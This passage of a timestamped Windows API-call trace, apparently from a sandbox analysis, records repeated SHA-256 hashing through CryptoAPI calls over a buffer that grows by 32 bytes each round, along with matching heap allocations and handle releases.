	[0217.038] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.038] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736298
	[0217.038] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736298, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736298, pdwDataLen=0x1284a8) returned 1
	[0217.038] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.038] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.038] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.038] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.038] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0217.038] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.038] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27362c0
	[0217.038] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27362c0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27362c0, pdwDataLen=0x1284a8) returned 1
	[0217.038] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.038] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.038] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.039] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.039] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0217.039] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.039] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27362e8
	[0217.039] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27362e8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27362e8, pdwDataLen=0x1284a8) returned 1
	[0217.039] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.039] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.039] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.039] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.039] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0217.039] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.039] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736310
	[0217.039] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736310, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736310, pdwDataLen=0x1284a8) returned 1
	[0217.039] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.039] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.039] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.040] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.040] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0217.040] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.040] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736338
	[0217.040] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736338, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736338, pdwDataLen=0x1284a8) returned 1
	[0217.040] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.040] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.040] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.040] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.040] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0217.040] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.040] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736360
	[0217.040] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736360, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736360, pdwDataLen=0x1284a8) returned 1
	[0217.040] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.040] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.040] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.041] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.041] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0217.041] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.041] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736388
	[0217.041] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736388, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736388, pdwDataLen=0x1284a8) returned 1
	[0217.041] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.041] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.041] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.041] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.041] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0217.041] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.041] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27363b0
	[0217.041] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27363b0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27363b0, pdwDataLen=0x1284a8) returned 1
	[0217.041] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.041] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.041] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.042] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.042] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0217.042] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.042] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27363d8
	[0217.042] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27363d8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27363d8, pdwDataLen=0x1284a8) returned 1
	[0217.042] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.042] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.042] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.042] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.042] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0217.042] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.042] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736400
	[0217.042] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736400, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736400, pdwDataLen=0x1284a8) returned 1
	[0217.042] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.042] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.042] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.043] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.043] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0217.043] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.043] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736428
	[0217.043] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736428, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736428, pdwDataLen=0x1284a8) returned 1
	[0217.043] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.043] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.043] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.043] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.043] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0217.043] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.043] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736450
	[0217.043] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736450, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736450, pdwDataLen=0x1284a8) returned 1
	[0217.043] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.043] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.043] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.044] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.044] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0217.044] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.044] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736478
	[0217.044] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736478, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736478, pdwDataLen=0x1284a8) returned 1
	[0217.044] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.044] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.044] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.044] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.044] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0217.044] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.044] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27364a0
	[0217.044] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27364a0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27364a0, pdwDataLen=0x1284a8) returned 1
	[0217.044] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.044] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.044] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.045] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.045] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0217.045] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.045] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27364c8
	[0217.045] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27364c8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27364c8, pdwDataLen=0x1284a8) returned 1
	[0217.045] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.045] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.045] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.045] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.045] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0217.045] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.045] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27364f0
	[0217.045] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27364f0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27364f0, pdwDataLen=0x1284a8) returned 1
	[0217.045] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.045] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.045] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.046] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.046] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0217.046] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.046] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736518
	[0217.046] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736518, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736518, pdwDataLen=0x1284a8) returned 1
	[0217.046] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.046] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.046] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.047] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.047] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0217.047] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.047] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736540
	[0217.047] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736540, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736540, pdwDataLen=0x1284a8) returned 1
	[0217.047] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.047] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.047] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.047] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.047] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0217.047] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.047] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736568
	[0217.047] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736568, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736568, pdwDataLen=0x1284a8) returned 1
	[0217.047] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.048] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.048] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.048] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.048] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0217.048] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.048] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc288
	[0217.048] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26cc288, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cc288, pdwDataLen=0x1284a8) returned 1
	[0217.048] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.048] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.048] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.049] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.049] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0217.049] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.049] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc0d0
	[0217.049] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x26cc0d0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cc0d0, pdwDataLen=0x1284a8) returned 1
	[0217.049] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.049] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.049] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.049] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.049] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0217.049] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.049] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc210
	[0217.049] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26cc210, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cc210, pdwDataLen=0x1284a8) returned 1
	[0217.049] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.049] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.049] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.050] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.050] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0217.050] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.050] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbd88
	[0217.050] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x26cbd88, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cbd88, pdwDataLen=0x1284a8) returned 1
	[0217.050] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.050] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.050] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.050] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.050] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0217.050] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.050] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cba68
	[0217.050] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26cba68, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cba68, pdwDataLen=0x1284a8) returned 1
	[0217.050] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.050] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.050] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.051] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.051] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0217.051] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.051] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbdd8
	[0217.051] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x26cbdd8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cbdd8, pdwDataLen=0x1284a8) returned 1
	[0217.051] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.051] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.051] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
